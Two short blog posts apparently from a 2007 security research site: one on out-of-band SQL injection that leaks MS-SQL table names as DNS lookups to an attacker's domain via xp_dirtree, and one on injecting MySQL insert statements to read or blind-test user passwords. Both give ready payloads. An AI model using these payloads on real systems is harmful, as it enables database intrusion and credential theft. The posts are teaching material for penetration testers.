SQL Injection And OOB

October 25, 2007 Research | Comments (0) sid @ 6:15 pm

I attended this talk in defcon 15. So, if you have identified a SQL injection and outbound connections are not blocked for udp port 53, than this probably is the best way to get data out of database Server. The most beautiful part of this attack is, you can get data from database server in form of dns requests, even without being 'sa' or 'dbo'. Things you will need:-

Access to Tcpdump running on a public ip address.

Here are a few examples:-

http://victim/exp.asp?name=blah';BEGIN DECLARE @r varchar(8000) SET @r=':' SELECT @r=@r+'.'+name FROM sysobjects WHERE xtype='U' AND name>@r end;DECLARE @x as varchar(8000);SET @x='\\'+SUBSTRING(@r,1,200)+'.mywebsite\x';EXEC master..xp_DIRTREE @x–

This will give you the first 200 chars of the output of  (SELECT name FROM sysobjects WHERE xtype='U')

by iterating through the substring() function you can then get all table names within 3-4 requests. 

How would you compare this with waitfor delay attack techniques.

Credits:-Pentestmonkey, ferruh 

Exploiting SQL Injections In Insert Statements

October 7, 2007 Research | Comments (0) sid @ 7:28 pm

Exploiting SQL Injections in Insert Statement, is not trivial as most of the times you do not directly see the output of the injected query.

Unlike MS-SQL, mysql 'generally' do not support use of multiple queries which is a common trick of exploiting SQL Injections when backend database is MS-SQL.

—————————————————- 

Example 1 

Lets consider a vulnerable example, the injection point being $id (integer field) in the following statement:-

insert into secret values($id, 'Welcome');

———————————————————– —–

Exploit 

insert into secret values(1000, (select passwd from users where id=1))#, 'Welcome');

'#' comments out the rest of the query.

—————————————————————— 

Example 2  Blind Injection

scenario:- injection is in last column of the query and is an integer field, hence an attacker can not directly select a password in an integer field

Query:- insert into secret values('WELCOME', $id);

EXPLOIT:- 

insert into secret values('WELCOME', (select if (passwd ='mypass',1,0) from users where id=1))#);

————————————————————————–

If 'magic_quotes' is enabled then one can use functions like ascii() and substr() to exploit it. 

Question:-  Can you exploit the above (example.2), if $id happens to be a string field. Let us know How.!!.:)